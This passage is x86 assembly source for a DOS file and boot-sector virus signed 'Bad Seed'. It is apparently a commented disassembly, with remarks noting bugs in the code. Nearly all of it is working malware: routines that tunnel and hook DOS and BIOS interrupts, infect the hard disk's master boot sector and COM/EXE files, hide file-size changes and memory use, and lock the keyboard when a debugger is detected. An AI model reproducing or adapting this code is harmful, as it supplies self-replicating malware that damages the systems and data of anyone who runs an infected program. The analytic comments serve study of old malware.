JMP_Run_Host:   JMP Run_Host

                DB 'Bad Seed - Made in OZ'

Save_ComSpec:   PUSH DS                         ; Swap DS & ES.
                PUSH ES
                POP DS
                POP ES

                XCHG SI, DI                     ; SI = end of path to command
                                                ; interpreter.

                STD                             ; SI = last byte of path to
                LODSW                           ; command interpreter.

                MOV CX, SI                      ; Remember end offset.
                DEC CX                          ; Exclude the '\'.

                ADD DI, 12                      ; DI = end of ComSpec_Value.
                                                ; *** Buffer is 1 byte too
                                                ; small, now filenames with
                                                ; 8 characters will fuck up.

Copy_ComSpec:   LODSB
                STOSB

                CMP AL, '\'                     ; Copied entire filename?
                JNE Copy_ComSpec                ; Otherwise just go on.

                SUB CX, SI                      ; Get the size of the command
                                                ; interpreter filename.

                POP SI

                PUSH CS
                POP DS

                ; Keep it for later use.

                MOV [SI+(ComSpec_Length-Boot_Loader)], CL

                MOV BYTE PTR [SI+(Origin-Boot_Loader)], File

                XOR AX, AX                      ; ES = IVT.
                MOV ES, AX

                PUSH SI

                ; Copy the stealth code to an unused piece
                ; of memory (only used during bootup).

                ADD SI, (File_Int21h-Boot_Loader)
                MOV DI, 600h
                MOV CX, (End_Body-File_Int21h)
                CLD
                REP MOVSB

                POP SI

                MOV DS, CX                      ; DS = IVT.


                ; Patch appropriate offsets.

                MOV DS:600h+(Ofs_Old_Int13h-File_Int21h), 600h+(Old_Int13h-File_Int21h)
                MOV DS:600h+(Ofs_Real_Int13h-File_Int21h), 600h+(Real_Int13h-File_Int21h)

                MOV AX, 600h                    ; INT 21h ISR to hook up.

Hook_Ints:      CLI

                ; Starting from a bootsector or file?

                CMP BYTE PTR CS:[SI+(Origin-Boot_Loader)], Boot
                JNE Hook_Int21h

                MOV AX, OFFSET New_Int08h       ; Hook INT 08h.
                XCHG DS:[(08h*4)], AX
                STOSW

                MOV AX, CS
                XCHG DS:[(08h*4)+2], AX
                STOSW

                MOV DS:[(21h*4)+2], 0FFFFh      ; Initialize DOS segment to
                                                ; a dummy value so the virus
                                                ; can determine when DOS has
                                                ; been loaded.

                STI

                ADD DI, (Old_Int13h-(Old_Int08h+4))
                JMP SHORT Init_Tunnel_13

Hook_Int21h:    XCHG DS:[(21h*4)], AX           ; Hook INT 21h.
                STOSW

                XCHG BX, AX                     ; Save original INT 21h.

                MOV AX, ES
                XCHG DS:[(21h*4)+2], AX
                STOSW

                XCHG BX, AX                     ; Store original INT 21h
                STOSW                           ; another time.

                XCHG BX, AX
                STOSW

                ; Hook INT 01h for recursive tunneling.

                LEA AX, CS:[SI+(New_Int01h-Boot_Loader)]
                XCHG DS:[(01h*4)], AX
                STOSW

                MOV AX, CS
                XCHG DS:[(01h*4)+2], AX
                STOSW

                STI

Init_Tunnel_13: CLC                             ; Save INT 13h, then tunnel
                                                ; INT 13h.

                PUSH ES

Save_Int13h:    PUSH DS


                LDS BX, DS:[(13h*4)]            ; Get (tunneled) INT 13h.

                MOV AX, BX                      ; Save (tunneled) INT 13h.
                STOSW

                MOV AX, DS
                STOSW

                JC Pick_i13h_ISR                ; Already tunneled INT 13h ?

                PUSH DS                         ; ES:BX = INT 13h.
                POP ES

                PUSHF                           ; Recursively tunnel INT 13h
                PUSH CS                         ; if origin is file, else
                CALL Tunnel_Int13h              ; just save INT 13h.

                POP DS
                POP ES

                STC                             ; Set flag to only save
                JC Save_Int13h                  ; INT 13h.

Pick_i13h_ISR:  POP DS

                PUSH SI

                CMP BYTE PTR CS:[SI+(Origin-Boot_Loader)], Boot

                PUSHF

                ; Stealth ISR.

                MOV SI, 600h+(Boot_Int13h-File_Int21h)

                JNE Hook_Int13h

                ; Stealth/infection ISR.

                MOV SI, OFFSET Boot_Int13h

Hook_Int13h:    CLI                             ; Hook the virus up.
                MOV DS:[(13h*4)], SI
                MOV DS:[(13h*4)+2], ES
                STI

                POPF

                POP SI

                PUSH CS
                POP DS

                JE Run_Old_Boot                 ; Pass control to real BS.

                ; If running from a file then go infect the MBS.

                PUSH ES

                PUSH CS
                POP ES


                MOV AX, 0201h                   ; Read the MBS of HDD 1.
                LEA BX, CS:[SI+(Buffer-Boot_Loader)]
                MOV CX, 1
                MOV DX, 80h
                INT 03h

                POP ES

                JNC Scan_Part_Tbl               ; Go on if no error.

                JMP SHORT Swap_Boot_ID          ; Error, bail.

Scan_Part_Tbl:  MOV CX, 4                       ; Maximum of 4 partitions.
                MOV DI, 1BEh                    ; Start of partition info.

Find_Act_Part:  TEST BYTE PTR [BX+DI], 80h      ; It's the active partition?
                JNZ Chk_Partition

                ADD DI, 16                      ; Next partition.

                LOOP Find_Act_Part              ; Check all partitions.

Run_Host:       POP DS                          ; Restore PSP.
                MOV DX, DS                      ; Save PSP in DX.

                POP ES

                ; This host is of EXE-type?

                CMP CS:[SI+(Host_Header-Boot_Loader)], 'ZM'
                JE Restore_EXE

                ; Restore .COM-file in memory and execute it.

                ADD SI, (Host_Header-Boot_Loader)
                MOV DI, 100h

                PUSH CS                         ; Push entrypoint of host
                PUSH DI                         ; *** CS mod ain't needed.

                MOVSB                           ; Restore first 3 bytes of
                MOVSW                           ; the host.

                XOR AX, AX                      ; Clear registers.
                XOR BX, BX
                XOR CX, CX
                XOR DX, DX
                XOR SI, SI
                XOR DI, DI

                XCHG BP, AX                     ; Restore FCB status in AX.

                RETF                            ; Jump to the host.

Run_Old_Boot:   XOR CX, CX                      ; Zero ES.
                MOV ES, CX

                MOV AX, 0201h                   ; Read the standard MS-DOS
                MOV BX, 7C00h                   ; bootsector.
                MOV CX, 1
                MOV DX, 0180h


                INT 13h

                PUSH ES                         ; And go execute it.
                PUSH BX

                RETF

Restore_EXE:    ADD DX, (100h/16)               ; Get effective segment.

                ; Update old CS & SS with it.

                ADD CS:[SI+(EXE_CS-Boot_Loader)], DX
                ADD DX, CS:[SI+(EXE_SS-Boot_Loader)]

                ; Restore host's original stack.

                MOV SS, DX
                MOV SP, CS:[SI+(EXE_SP-Boot_Loader)]

                XCHG BP, AX                     ; Restore AX (FCB status).

                ; Jump to the host's original entrypoint.

                JMP DWORD PTR CS:[SI+(EXE_IP-Boot_Loader)]

Chk_Partition:  INC DI                          ; Start of partition.

                MOV ES:[600h+(Act_Partition-File_Int21h)], DI
                MOV DS:[SI+(Act_Partition-Boot_Loader)], DI

                MOV AX, 0200h                   ; Head 0, sector 2 (where
                                                ; the virusbody is located).

                CMP DS:[BX+DI], AX              ; MBS is already infected?
                JE Run_Host                     ; Then just bail out.

                MOV DS:[BX+DI], AX              ; Point partition's boot-
                                                ; sector to virusbody.

                PUSH CS
                POP DS

                CLC                             ; No errors so far..

Swap_Boot_ID:   MOV AX, 0AA55h                  ; Bootsector ID.

                XCHG DS:[SI+510], AX            ; Swap-in bootsector ID.

                PUSH AX                         ; Save original word.
                JC Chk_If_Unhook                ; Error occurred?

                ; Save original word in virusbody.

                MOV [SI+(Original_Word-Boot_Loader)], AX

                PUSH CS
                POP ES

                MOV AX, 0301h                   ; Write patched MBS back
                MOV CX, 1                       ; to disk.
                MOV DX, 80h
                INT 03h
                JC Chk_If_Unhook


                ; Write the virusbody to the zero-track.

                MOV AX, 0300h+(Virus_Size_512)
                MOV BX, SI
                MOV CX, 2
                INT 03h

Chk_If_Unhook:  MOV AX, 0                       ; Zero DS & ES (without
                MOV ES, AX                      ; changing any flags).
                MOV DS, AX

                PUSH SI

                CLD
                CLI

                JNC Restore_Int03h              ; Harddisk was successfully
                                                ; infected? If not, unhook
                                                ; the INT 13h stealth.

                MOV SI, 600h+(Old_Int13h-File_Int21h)
                MOV DI, (13h*4)
                MOVSW
                MOVSW

Restore_Int03h: POP SI
                PUSH SI

                PUSH CS
                POP DS

                ; Restore INT 03h.

                ADD SI, (Old_Int03h-Boot_Loader)
                MOV DI, (03h*4)
                MOVSW
                MOVSW

                STI

                POP SI

                POP DS:[SI+510]                 ; Restore original word.

                JMP Run_Host

; Called with ES:BX as vector address of INT 13h.
Tunnel_Int13h:
                PUSHF

                ; Not necessary to tunnel from boot.

                CMP BYTE PTR CS:[SI+(Origin-Boot_Loader)], Boot
                JE Push_CS_IP

                POPF

                MOV AX, 300h                    ; Flags, TF & IF enabled.
                PUSH AX

Push_CS_IP:     PUSH ES                         ; Untunneled INT 13h.
                PUSH BX


                MOV AH, 01h                     ; Get status byte.
                MOV DL, 80h                     ; 1st HDD.

New_Int01h:     CLI

                PUSH BP                         ; Setup a stack pointer.
                MOV BP, SP

                PUSH BX                         ; Save scrap registers.
                PUSH AX

                MOV BX, CS                      ; *** Not used.

                MOV AX, [BP+(2*2)]              ; Get segment of next
                                                ; instruction.

                CMP AX, 70h                     ; In the DOS kernel?
                JA Exit_Int01h                  ; If not then get out.

                PUSH DS
                PUSH ES

                XOR BX, BX                      ; DS = IVT.
                MOV DS, BX

                MOV DS:[(13h*4)+2], AX          ; Set tunneled address in
                                                ; IVT.

                MOV BX, [BP+(1*2)]              ; And the IP..
                MOV DS:[(13h*4)], BX

                PUSH DI

                CALL Get_Delta_1

Old_Int03h      DW 0, 0

Get_Delta_1:    POP DI                          ; POP delta offset.

                PUSH CS
                POP ES

                CLD

                XCHG BX, AX                     ; Revector the tunneled
                XCHG DS:[(03h*4)], AX           ; INT 13h to INT 03h.
                STOSW

                XCHG BX, AX
                XCHG DS:[(03h*4)+2], AX
                STOSW

                PUSH DS                         ; ES = IVT.
                POP ES

                PUSH SI

                ; Unhook INT 01h.

                MOV SI, 600h+(Old_Int01h-File_Int21h)
                MOV DI, (01h*4)
                MOVSW


                MOVSW

                POP SI

                POP DI
                POP ES
                POP DS

Exit_Int01h:    POP AX                          ; Restore registers.
                POP BX
                POP BP

                STI                             ; *** Useless instruction.

                IRET

ComSpec_String  DB 'COMSPEC='
ComSpec_Value   DB 13 DUP (0)
ComSpec_Length  DW 0

New_Int08h:     PUSH DS
                PUSH AX

                XOR AX, AX                      ; DS = IVT.
                MOV DS, AX

                CMP DS:[(21h*4)+2], 1000h       ; DOS hasn't grabbed INT 21h
                JA Exit_Int08h                  ; yet? Then wait some more..

                PUSH ES
                PUSH SI
                PUSH DI

                PUSH CS
                POP ES

                MOV AX, CS
                MOV DI, OFFSET Old_Int21h+2
                NOP

                STD                             ; Hook INT 21h.
                CLI
                XCHG AX, DS:[(21h*4)+2]
                STOSW

                MOV AX, OFFSET Boot_Int21h
                XCHG AX, DS:[(21h*4)]
                STOSW

                PUSH DS                         ; Swap DS & ES.
                PUSH ES
                POP DS
                POP ES

                MOV SI, DI                      ; Unhook INT 08h.
                MOV DI, (08h*4)+2
                MOVSW
                MOVSW

                STI


                POP DI
                POP SI
                POP ES

Exit_Int08h:    POP AX
                POP DS

                JMP DWORD PTR CS:Old_Int08h

Boot_Int21h:    PUSH DS
                PUSH AX

                XOR AX, AX                      ; DS = IVT.
                MOV DS, AX

                MOV AX, DS:[(01h*4)]            ; Offset of INT 01h's ISR.

                CMP AX, DS:[(03h*4)]            ; Same as INT 03h's ?
                JNE Lock_Keyboard

                MOV AX, DS:[(01h*4)+2]          ; Segment of INT 01h's ISR.

                CMP AX, DS:[(03h*4)+2]          ; Same as INT 03h's ?
                JE Exit_No_Debug                ; If INT 01h != INT 03h then
                                                ; a debugger is active.

Lock_Keyboard:  MOV AL, 10000010b               ; Disable keyboard & printer.
                OUT 21h, AL

Exit_No_Debug:  POP AX
                POP DS

Test_11h_12h:   CMP AH, 11h                     ; Findfirst (FCB) ?
                JE Do_FCB_Stealth

                CMP AH, 12h                     ; Findnext (FCB) ?
                JNE Check_4_Create

                ; This is the routine Rock Steady/NuKE used in his
                ; FCB stealth tut, with one or two bytes changed.
                ; The rest of the code also shows a certain influence
                ; of the Rock Steady tuts.

Do_FCB_Stealth: CALL Do_Old_Int21h              ; Do the filefind.

                TEST AL, AL                     ; Error?
                JNZ IRET_FCB_St

                PUSH ES
                PUSH AX
                PUSH BX

                MOV AH, 51h                     ; Obtain current PSP.
                CALL Do_Old_Int21h

                MOV ES, BX

                CMP BX, ES:[16h]                ; Owner PSP == PSP ? (ie. is
                JNE Exit_FCB_St                 ; command interpreter?).


                MOV BX, DX
                MOV AL, [BX]                    ; Get first byte of FCB.

                PUSH AX

                MOV AH, 2Fh                     ; Obtain current DTA.
                CALL Do_Old_Int21h

                POP AX

                INC AL                          ; It's an extended FCB ?
                JNZ Test_Seconds

                ADD BX, 7                       ; Then skip extended stuff.

Test_Seconds:   MOV AX, ES:[BX.FCB_Time]        ; Grab time word.

                AND AX, 0000000000011111b       ; Mask out seconds value.

                XOR AL, (60/2)                  ; 60 seconds? (infected?).
                JNZ Exit_FCB_St

                ; Set the seconds value in the DTA to 2.

                AND BYTE PTR ES:[BX.FCB_Time], 11100000b
                OR BYTE PTR ES:[BX.FCB_Time], (2/2)

                ; Subtract the virussize from the filesize.

                SUB ES:[BX.FCB_Size], Virus_Size
                SBB ES:[BX.FCB_Size+2], AX

Exit_FCB_St:    POP BX
                POP AX
                POP ES

IRET_FCB_St:    IRET

Check_4_Create: CMP AH, 3Ch                     ; Create/truncate file?
                JE Set_RW_BX                    ; Then save its handle
                                                ; so it can be infected
                                                ; on close.

                CMP AH, 3Dh                     ; Open file?
                JE Set_RW_AL                    ; Go infect it.

                CMP AH, 3Eh                     ; Close file?
                JNE Check_4_Read

                JMP Infect_3E                   ; Infect it if it was
                                                ; a newly created file.

Check_4_Read:   CMP AH, 3Fh                     ; Read file?
                JE J_Go_Chk_Secs                ; Stealth the read.

                CMP AH, 40h                     ; Write file?
                JE J_Go_Chk_Secs                ; Disinfect the file.

                CMP AH, 42h                     ; Seek file?
                JNE Check_4_Exec

                CMP AL, 02h                     ; Seek EOF relative?
                JB J1_J_Old_i21h


J_Go_Chk_Secs:  JMP Go_Check_Secs               ; Stealth stuff.

Check_4_Exec:   CMP AH, 4Bh                     ; Execute/load file?
                JNE Check_4_Exit

                CMP AL, 02h                     ; It's either 4B00h or 4B01h?
                JB CALL_Do_Infect               ; Else don't infect.

                JMP SHORT J1_J_Old_i21h

Set_RW_AL:      CMP CS:Windows_Active, 1        ; Is Windoze running? Then
                JE J1_J_Old_i21h                ; don't do anything.

                CMP AX, 3D01h                   ; Open file, write-only?
                JNE CALL_Do_Infect

                INC AL                          ; Then change access mode to
                                                ; read/write so the virus
                                                ; can read from it when it
                                                ; wants to disinfect it.

CALL_Do_Infect: CALL Do_Infect                  ; Infect it.

J1_J_Old_i21h:  JMP JMP_Old_Int21h

Check_4_Exit:   CMP AH, 4Ch                     ; Program terminate?
                JNE Check_4_Date_T

                JMP Check_Win_Exit              ; Go check if it's Windoze.

Check_4_Date_T: CMP AH, 57h                     ; Get/set file date & time?
                JNE Chk_4_Create_N

                JMP Stealth_Seconds             ; Don't let em fuck with the
                                                ; seconds.

Chk_4_Create_N: CMP AH, 5Bh                     ; Create new file?
                JE Set_RW_BX                    ; Save its handle for later.

                CMP AX, 6C00h                   ; Extended open/create?
                JNE Chk_4_Res_Chk

Set_RW_BX:      CMP CS:Windows_Active, 1        ; Is Windoze up and running?
                JE J1_J_Old_i21h                ; Then abort any infection.

                PUSH BX
                PUSH DX

                CMP AX, 6C00h                   ; Don't infect on create.
                JNE Save_Handle

                OR BL, 00000010b                ; Change access mode to
                AND BL, 11111110b               ; read/write.

                MOV DX, SI                      ; DX = offset filepath.
                CALL Do_Infect

Save_Handle:    PUSH BX
                PUSH ES
                PUSH AX
                PUSH CX
                PUSH SI


                PUSH DI

                PUSH DS
                POP ES

                CALL Get_End_DX                 ; Go to end of path.

                STD
                MOV SI, DI

                LODSB                           ; SI = last word extension.
                LODSW

                CALL Check_Extension            ; .COM/EXE extension?

                MOV CS:Valid_Handle, CL         ; Mark handle as invalid (0).

                JNE Do_Open_Create

                INC CX                          ; Mark handle as valid (1).
                MOV CS:Valid_Handle, CL

Do_Open_Create: POP DI
                POP SI
                POP CX
                POP AX
                POP ES
                POP BX
                POP DX

                PUSH AX

                CALL Do_Old_Int21h              ; Do the open/create call.
                JC Clear_Inf_Hand

                INC SP                          ; Remove the top word on
                INC SP                          ; the stack.

                XCHG BX, AX                     ; Save the new filehandle.

                PUSH CX
                PUSH DX

                MOV AX, 5700h                   ; Get file's date & time.
                CALL Do_Old_Int21h

                CALL Check_60_Secs              ; It's infected?

                POP DX
                POP CX

                XCHG BX, AX

                JNE Save_Inf_Hand

                MOV CS:Valid_Handle, AL         ; Mark handle as valid (> 0).

Save_Inf_Hand:  MOV CS:File_Handle, AL          ; Save this filehandle.
                POP BX

                JMP IRET_Flags

Clear_Inf_Hand: MOV CS:Valid_Handle, 0          ; Reset handle-valid boolean.
                POP AX


                POP BX
                JMP JMP_Old_Int21h

Chk_4_Res_Chk:  CMP AX, 0EEE7h                  ; It's the virus' TSR check?
                JE Return_ID_1

                JMP JMP_Old_Int21h

Return_ID_1:    MOV AH, 0D7h                    ; Return ID in AX and return.

New_Int24h:     MOV AL, 03h                     ; Fail silently.
                IRET

Get_End_DX:     MOV DI, DX

Get_End_DI:     XOR AL, AL                      ; Scan to the end of the
                MOV CL, 128                     ; filepath.
                CLD
                REPNZ SCASB

                RETN

Do_Infect:      PUSH ES
                PUSH BX
                PUSH CX
                PUSH SI
                PUSH DI
                PUSH DS
                PUSH DX

                PUSH DS
                POP ES

                PUSH AX

                CALL Get_End_DX

                DEC DI                          ; DI = last byte of filename.
                DEC DI

                PUSH CS
                POP DS

                MOV CX, ComSpec_Length
                MOV SI, OFFSET ComSpec_String+8+12
                STD

                PUSH DI

Comp_ComSpec:   LODSB                           ; Save ComSpec byte in AH.
                MOV AH, AL

                XCHG SI, DI

                LODS BYTE PTR ES:[SI]           ; Fetch byte from filename.

                XCHG SI, DI

                AND AX, 5F5Fh                   ; Convert word to uppercase.


                CMP AH, AL                      ; Bytes match?
                JNE Go_Check_Ext                ; If not it's not ComSpec.

                LOOP Comp_ComSpec

                POP DI                          ; If it gets to here, the
                                                ; file is the COMSPEC, and
                JMP Exit_Infect                 ; infection is denied.

; Returns ZF if file has COM/EXE extension.
Check_Extension:
                MOV CX, 2

Get_Extension:  LODS WORD PTR ES:[SI]

                AND AX, 5F5Fh                   ; Uppercase.

                XCHG BX, AX

                LOOP Get_Extension

                CMP AX, 'MO'
                JNE Check_For_EXE

                CMP BX, 'C.' AND 5F5Fh

                RETN

Check_For_EXE:  CMP AX, 'EX'
                JNE Exit_Check_Ext

                CMP BX, 'E.' AND 5F5Fh

Exit_Check_Ext: RETN

Go_Check_Ext:   POP SI                          ; SI = last byte of filename.
                DEC SI                          ; SI = last word of filename.

                POP AX                          ; AX on entry.
                PUSH AX

                CMP AX, 4B00h                   ; Program execute?
                PUSHF

                CALL Check_Extension            ; File has COM/EXE extension?
                JE Go_Chk_Win_Act

                POPF
                JE Find_File_Name

                JMP Exit_Infect

                DB 'CHKDSK', 0
Windows_Active  = BYTE PTR $-1

                DB 'MEM'
Mem_String      = $-1

Go_Chk_Win_Act: POPF
                JNE Check_Windows

Find_File_Name: INC SI                          ; DI = byte before dot.


                MOV DI, SI

                INC SI                          ; SI = extension dot.

                MOV CX, SI                      ; Calculate path length.
                SUB CX, DX

                XCHG SI, DI

Chk_Start_Name: LODS BYTE PTR ES:[SI]           ; Fetch a byte from path.

                CMP AL, '\'                     ; Path separator? Then start
                JE Get_Start_Name               ; of filename is found.

                LOOP Chk_Start_Name

                JNE Chk_File_Name

Get_Start_Name: INC SI                          ; SI = start of filename.
                INC SI

                MOV DX, SI

Chk_File_Name:  MOV CX, DI                      ; Calculate length of
                SUB CX, DX                      ; filename without extension.

                DEC DI                          ; DI = last byte of filename.
                MOV SI, OFFSET Mem_String

                CMP CX, 3                       ; Can it be 'MEM' ?
                JE Compare_Byte

                LODSW                           ; SI = 'CHKDSK' string.
                LODSW

                CMP CX, 6                       ; Can it be 'CHKDSK' ?
                JNE Check_Windows

Compare_Byte:   LODSB                           ; Fetch byte of filename and
                MOV AH, AL                      ; save it in AH.

                XCHG SI, DI

                LODS BYTE PTR ES:[SI]           ; Fetch byte of match string.

                AND AX, 5F5Fh                   ; Convert to uppercase.

                CMP AH, AL                      ; Bytes are the same?
                JNE Check_4_Win                 ; If not, skip this shit.

                XCHG SI, DI

                LOOP Compare_Byte

                ; Now that either MEM or CHKDSK are about to be executed, the
                ; virus will temporarily hook INT 12h to stealth the total
                ; amount of DOS memory available, which these programs will
                ; display.

                MOV AX, OFFSET New_Int12h
                MOV DI, OFFSET Old_Int12h

                NOP


                MOV DS, CX                      ; DS = IVT.

                PUSH CS
                POP ES

                CLD
                CLI

                XCHG DS:[(12h*4)], AX           ; Save & hook INT 12h.
                STOSW

                MOV AX, CS
                XCHG DS:[(12h*4)+2], AX
                STOSW

                STI
                JMP SHORT Check_Windows

Check_4_Win:    CMP CX, 3                       ; Can it be 'WIN.COM' ?
                JNE Check_Windows

                CMP AL, 'N'                     ; (WI)N ?
                JNE Check_Windows

                DEC SI                          ; SI = 1st word of filename.
                LODS WORD PTR ES:[SI]

                AND AX, 5F5Fh                   ; Uppercase.

                CMP AX, 'IW'                    ; So it's WIN.COM ?
                JNE Check_Windows

                MOV Windows_Active, 1           ; Set Windoze-active flag.

Check_Windows:  CMP CS:Windows_Active, 1        ; Don't infect under Windoze.
                JE Exit_Infect

                CLI

                XOR CX, CX                      ; DS = IVT.
                MOV DS, CX

                LES BX, DS:[(24h*4)]            ; Save original INT 24h.
                PUSH ES
                PUSH BX

                ; Install own dummy critical-error handler.

                MOV DS:[(24h*4)], OFFSET New_Int24h
                MOV DS:[(24h*4)+2], CS

                STI

                PUSH DS

                PUSH BP                         ; Setup stackframe.
                MOV BP, SP

                LDS DX, [BP+(5*2)]              ; DS:DX = path of file.

                POP BP

                PUSH DS


                PUSH DX

                MOV AX, 4300h                   ; Get file's attributes.
                CALL Do_Old_Int21h

                PUSH CX
                JC Restore_Attr

                TEST CL, 00000001b              ; Readonly bit set?
                JZ Open_File

                DEC CX                          ; Remove readonly bit.

                MOV AX, 4301h                   ; Set new attributes.
                CALL Do_Old_Int21h

Open_File:      MOV AX, 3D02h                   ; Open target file for r/w.
                CALL Do_Old_Int21h
                JC Restore_Attr

                XCHG BX, AX                     ; Save filehandle in BX.

                MOV AX, 5700h                   ; Get file date & time.
                CALL Do_Old_Int21h
                JC Close_File

                CALL Check_60_Secs              ; Already infected?
                JE Close_File

                PUSH CX                         ; Save original filedate &
                PUSH DX                         ; time with 60 seconds set.

                CALL Infect_Handle              ; Infect the handle.

                POP DX
                POP CX

                JC Close_File                   ; Error occurred?

                MOV AX, 5701h                   ; Restore file date & time
                CALL Do_Old_Int21h              ; with 60 seconds.

Close_File:     MOV AH, 3Eh                     ; Close the file.
                CALL Do_Old_Int21h

Restore_Attr:   POP CX                          ; File path & attributes.
                POP DX
                POP DS

                JC Restore_Int24h               ; Error occurred?

                TEST CL, 00000001b              ; Need to restore the
                JZ Restore_Int24h               ; readonly flag?

                MOV AX, 4301h                   ; Fix file-attributes.
                CALL Do_Old_Int21h

Restore_Int24h: POP DS
                POP BX
                POP AX

                MOV DS:[(24h*4)], BX            ; Restore INT 24h.
                MOV DS:[(24h*4)+2], AX


Exit_Infect:    POP AX
                POP DX
                POP DS
                POP DI
                POP SI
                POP CX
                POP BX
                POP ES

                RETN

Infect_Handle:  PUSH CS
                POP DS

                MOV DX, OFFSET Buffer           ; Read file's header.
                NOP

                MOV CX, 24
                MOV AH, 3Fh
                CALL Do_Old_Int21h

                SUB CX, AX                      ; All bytes were read?
                JNZ Error_Exit_Inf

                PUSH DS                         ; ES = CS.
                POP ES

                XCHG CX, AX                     ; CX = 24.

                MOV SI, DX                      ; Save a copy of the original
                MOV DI, OFFSET Host_Header      ; header.
                CLD
                REP MOVSB

                MOV DI, DX                      ; DX = header.
                MOV SI, OFFSET EXE_Data

                ; Save host's original SS:SP.

                LES AX, DWORD PTR [DI.Program_SS]

                MOV [SI+(EXE_SP-EXE_Data)], ES
                MOV [SI+(EXE_SS-EXE_Data)], AX

                ; Save host's original CS:IP.

                LES AX, DWORD PTR [DI.Program_IP]

                MOV [SI+(EXE_IP-EXE_Data)], AX
                MOV [SI+(EXE_CS-EXE_Data)], ES

                MOV Host_Type, CL               ; Initialize file as .EXE.

                MOV AX, 'MZ'                    ; EXE marker.

                CMP AX, [DI.EXE_ID]             ; .EXE-ID is 'ZM' ?
                XCHG AH, AL                     ; Change .EXE-ID to 'MZ'.
                JNE Check_For_MZ

                MOV [DI.EXE_ID], AX             ; Set .EXE-ID to 'MZ'.

Check_For_MZ:   CMP AX, [DI.EXE_ID]             ; 'MZ' .EXE-file?


                JE Save_File_Size

                INC Host_Type                   ; Mark as .COM-file.

Save_File_Size: MOV AX, 4202h                   ; Seek to EOF.
                MOV DX, CX
                CALL Do_Old_Int21h
                JC Exit_Inf_Hand

                ; Remember size of host for later use.

                MOV [DI+(Host_Size-Buffer)], AX
                MOV [DI+(Host_Size-Buffer)+2], DX

                CMP Host_Type, EXE              ; File is .EXE-type? Then
                JE Check_Header                 ; size check ain't needed.

                CMP AX, -(Virus_Size+264h)      ; .COM-file ain't too big?
                JB Append_Body

Error_Exit_Inf: STC                             ; Else mark error.

Exit_Inf_Hand:  RETN

Check_Header:   PUSH DI

                MOV CX, 9

                MOV SI, [DI.File_512_Pages]     ; Filesize in 512-byte pages.
                DEC SI                          ; Undo 512-byte round.

                XOR DI, DI                      ; DI:SI = imagesize.

Mul_512:        SHL SI, 1                       ; Calculate imagesize in
                RCL DI, 1                       ; DI:SI.
                LOOP Mul_512

                CMP DX, DI                      ; High word doesn't match?
                POP DI

                JNE Error_Exit_Inf              ; Then it's an overlay.

                ADD SI, [DI.Image_Mod_512]      ; Image size remainder.

                ; Low word of filesize doesn't match?

                CMP SI, [DI+(Host_Size-Buffer)]
                JNE Error_Exit_Inf

                CMP AX, Virus_Size              ; .EXE can't be smaller than
                SBB DX, 0                       ; the virus itself.
                JC Exit_Inf_Hand

                XOR DX, DX

                CMP DX, [DI.Max_Size_Mem]       ; Can't have a NULL maximum
                JE Error_Exit_Inf               ; memory requirement.

Append_Body:    MOV CX, Virus_Size              ; Append virusbody to file.
                MOV AH, 40h
                CALL Do_Old_Int21h
                JC Exit_Inf_Hand

                SUB CX, AX                      ; Were all bytes written?


                JNZ Error_Exit_Inf              ; Else mark as failure.

                MOV DX, CX                      ; *** DX is already zero.

                MOV AX, 4200h                   ; Seek to BOF.
                CALL Do_Old_Int21h
                JC Exit_Inf_Hand

                MOV AX, [DI+(Host_Size-Buffer)]

                CMP Host_Type, COM
                JE Infect_COM

Infect_EXE:     MOV DX, [DI+(Host_Size-Buffer)+2]

                MOV CX, 4
                PUSH DI

                MOV SI, [DI.Header_Size]
                XOR DI, DI

Mul_16:         SHL SI, 1                       ; Calculate headersize.
                RCL DI, 1
                LOOP Mul_16

                SUB AX, SI                      ; Calculate imagesize.
                SBB DX, DI

                POP DI

                MOV CL, 12                      ; 64k's DIV 4096 to get the
                SHL DX, CL                      ; new CS.

                MOV [DI.Program_IP], AX
                MOV [DI.Program_CS], DX

                ADD DX, 3408/16                 ; Set new stack.

                MOV [DI.Program_SP], AX
                MOV [DI.Program_SS], DX

                ADD [DI.Min_Size_Mem], 448/16
                MOV AX, [DI.Min_Size_Mem]

                CMP AX, [DI.Max_Size_Mem]       ; MaxMemSize must be at least
                JB Calc_New_Img_S               ; MinMemSize.

                MOV [DI.Max_Size_Mem], AX       ; MaxMemSize == MinMemSize.

Calc_New_Img_S: MOV AX, [DI.Image_Mod_512]
                ADD AX, Virus_Size

                PUSH AX

                AND AH, 1                       ; AX modulo 512.

                MOV [DI.Image_Mod_512], AX
                POP AX

                MOV CL, 9                       ; AX DIV 512.
                SHR AX, CL

                ADD [DI.File_512_Pages], AX
                MOV DX, OFFSET Buffer

                NOP


                MOV CX, 24                      ; Write 24 bytes (MZ-header).
                JMP SHORT Write_Header

Infect_COM:     MOV DX, OFFSET Buffer
                NOP

                MOV DI, DX
                MOV BYTE PTR [DI], 0E9h         ; JMP xxxx.

                INC DI
                SUB AX, 3                       ; Calculate displacement.

                PUSH DS
                POP ES

                CLD                             ; Store JMP displacement.
                STOSW

                MOV CX, 3                       ; Write 3 bytes (JMP_Virus).

Write_Header:   MOV AH, 40h                     ; Write modified header.
                CALL Do_Old_Int21h
                JC Bad_Exit

                CMP AX, CX                      ; All bytes were written?
                JE Good_Exit

Bad_Exit:       STC

Good_Exit:      RETN

; Infect the handle of a newly created file when it is closed.
Infect_3E:
                CMP CS:File_Handle, BL          ; They're closing our handle?
                JNE Go_Close_Hnd

                CMP CS:Valid_Handle, 1          ; Does File_Handle contain
                JNE Go_Close_Hnd                ; a valid filehandle at all?

                DEC CS:Valid_Handle             ; Reset the filehandle (0).

                PUSH DS
                PUSH ES
                PUSH AX
                PUSH BX
                PUSH CX
                PUSH DX
                PUSH SI
                PUSH DI

                MOV AX, 4200h                   ; Seek to file's header.
                XOR CX, CX
                XOR DX, DX
                CALL Do_Old_Int21h

                CALL Infect_Handle              ; Go infect the file.
                JC Exit_Infect_3E

                MOV AX, 5700h
                CALL Do_Old_Int21h

                INC AL                          ; *** Not used.

                OR CL, (62/2)                   ; Set 60 seconds.
                DEC CX


                MOV AX, 5701h
                CALL Do_Old_Int21h

Exit_Infect_3E: POP DI
                POP SI
                POP DX
                POP CX
                POP BX
                POP AX
                POP ES
                POP DS

Go_Close_Hnd:   CALL Do_Old_Int21h

                JMP IRET_Flags

Go_Check_Secs:  PUSH ES
                PUSH AX
                PUSH BX
                PUSH CX
                PUSH DX
                PUSH SI
                PUSH DI

                MOV AX, 5700h
                CALL Do_Old_Int21h

                OR AL, AL                       ; *** This seems fucked, CF
                JC Exit_Go_Chk_Se               ; is always cleared after OR.

                CALL Check_60_Secs

Exit_Go_Chk_Se: POP DI
                POP SI
                POP DX
